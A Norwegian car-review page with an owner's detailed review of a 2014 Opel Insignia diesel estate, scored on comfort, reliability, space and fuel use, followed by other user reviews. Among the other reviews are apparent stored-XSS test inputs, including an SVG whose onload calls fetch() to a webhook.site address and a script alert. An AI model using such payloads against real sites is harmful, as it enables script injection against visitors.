Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2014 Opel Insignia 2,0 CDTi 120hk S/S SportsTourer Premium Stasjonsvogn Diesel

Score 7.4/10

Insignia er jevnt over en solid og godt gjennomtenkt bil som evner å få fram følelsen av å være en tysk milsluker. Som bruktbil bør dette absolutt være et seriøst alternativ for de som kjører mye bil. Lite feil, mye utstyr, god komfort, gode kjøreegenskaper og et småtøft design er egenskaper som bør fremheves. Opel går under radaren for mange, og her er det lett å kjøre seg en god handel på bruktmarkedet.

Kjøreglede

7 / 10
Ligger tungt og godt på veien. Har presis men dog noe ufølsom styrefølelse, som er tydelig vektet mot komfort. Chassiet oppleves som selvsikkert og stabilt, og med flexride kan bilen være både fast og svingglad eller en myk milsluker. Bilen stortrives på motorvei og svingete landeveier med varierende standard. Dersom veien blir smal og kronglete eller har telehiv kommer bilens vekt frem, og bilen kjennes fort stor og uhåndterlig ut. Ikke misforstå, det er lett å hvite hvor man har den, men det blir litt som å kjøre tankbåt i en småbåthavn. Nok om det negative. Alt i alt er dette en selvsikker og komfortabel kjørebil man gjerne tilbakelegger lengre distanser med, og den kan på ingen måte sammenlignes med tidligere modeller, som blir å betrakte som jekktraller i forhold. Hadde bilen "krympet" mer på kjerrestier og hatt litt mer feedback i rattet ville karakteren vært en klar åtter, for det fortjener bilen egentlig.

Kvalitet/driftssikkerhet

8 / 10
Feil på nivåsensor bak og en radar for filskiftevarsler/ryggeassistent i bakfangeren har vært feil på 93 000 km / litt over to år. Dette ble utbedret på garantien.

Plass/praktiske løsninger

7 / 10
Tilstrekkelig plass foran og bak, men vi opplevde å ha like mye plass i framsetet på en Volvo V50 med bakovervendt barnestol montert i begge bilene. Enormt bagasjerom som desverre lider i høyden på grunn av avrundet hekk med skrående d-stolpe. Dette gjør det trangt under innlasting av store barnevogner. Det er i overkant langt inn i lasterommet på grunn av den tykke, avrundede bakluken. God plass til handlenett både foran og bak barnevogn takket være digert bagasjeromsgulv. God oppbevaringsplass i hanskerom og midtkonsoll med to koppholdere. Skiluke i baksete, som for øvrik er delt 60/40.

Økonomi/kostnader

7 / 10
Rimelig å eie med tanke på servicekostnader og drivstofforbruk. Lite dyre feil. Bruktbilpris noe lav.

Drivstoff/forbruk

8 / 10
0,5 liter per mil i daglig pen pendlerbruk er ikke et problem å oppnå. Noe høyere i bykjøring. Snitt siden bil var ny er 0,52 liter per mil. Dette er inkludert tomgangskjøring, ferie med vogn og motorveiskjøring, samt litt bykjøring.

Flere vurderinger fra samme generasjon

Opel Insignia (2016)

veldig bra bil, nydelig design

Score 9.8

Vurdert av Koenraad

Opel Insignia (2016)

Topp bil så langt, men bare få mil før garantien utløper, så får vi se da

Score 9.8

Vurdert av Kryg

Opel Insignia (2016)

Helt topp bil.Ingen feil eller problemer. Helt herlig kjørekomfort. Bra motor.Flere burde få opp øynene for denne

Score 10

Vurdert av Boms

Opel Insignia (2016)

Veldig god bil, ikke noe tull, rå gode seter, veldig god kjørekomfort, lite drivstoff forbruk og fantastisk giresystem! Eneste som mangler er vel 4x4.. utrolig sprek til å ikke være sterkere!! Hel

Score 9.6

Vurdert av KunOpel

Opel Insignia (2016)

Meget fornøyd. Blir garantert en Insignia til når den nye modellen kommer..

Score 9.2

Vurdert av Usiu

Opel Insignia (2016)

Svært fornøyd med bilen og kjøpet. God komfort og sikkerhet og nok med plass til hele familien, Vil absolutt anbefale denne bilen videre.

Score 10

Vurdert av hannef

Opel Insignia (2014)

Er bare kjempe førnøyd, Av 50 kjørte mil med mange mik i 110 forbuk 0.4 ltr Hatt mange volvoer, nå er det opel!!

Score 9.0

Vurdert av Bjelland

Opel Insignia (2014)

God og pen bil! Lavt (!) forbruk, nede i 0,5 l/mil, FULLT utstyrsnivå til en lav pris, premiumfølelse, støysvak, nydelig på langkjøring. Man blir litt lurt pga den store bakluka som tar bort noe

Score 8.2

Vurdert av Teikri89

Opel Insignia (2014)

God bil og greit design for en billig bil som fortsatt kommer fra riktig billand.. Tyskland

Score 8.4

Vurdert av Martin

Opel Insignia (2014)

Alt i alt en god bil som eg likte godt. Men pga mange verkstedbesøk i garantiperioden valgte vi å selge bilen ved utløp av denne.

Score 7.2

Vurdert av Frank

Opel Insignia (2014)

8/10. Dette er vel noe av det bedre du kan kjøpe og ha som en fullverdig familiebil. Lave kostnader. Driftssikkert og fin å kjøre.

Score 8.0

Vurdert av Espen

Opel Insignia (2014)

Har hatt 27 biler før, alt fra Lada til Porsche. Insignia desidert best!

Score 10

Vurdert av Jens

Opel Insignia (2014)

Masse bil for pengene - etter min oppfatning bortimot unik.

Score 9.2

Vurdert av Kjell

Opel Insignia (2014)

Først og fremst ekstremt mye bil for pengene. I tillegg overraskende lavt forbruk.

Score 9.2

Vurdert av Kjell

Opel Insignia (2014)

Insignia er en undervurdert bil. Vi er kjempefornøyd med bilen! Mye bil for pengene.

Score 8.8

Vurdert av Knut

Flere vurderinger

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans

BMW 3-Serie (2012)

Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat

Score 8.8

Vurdert av Knappertappen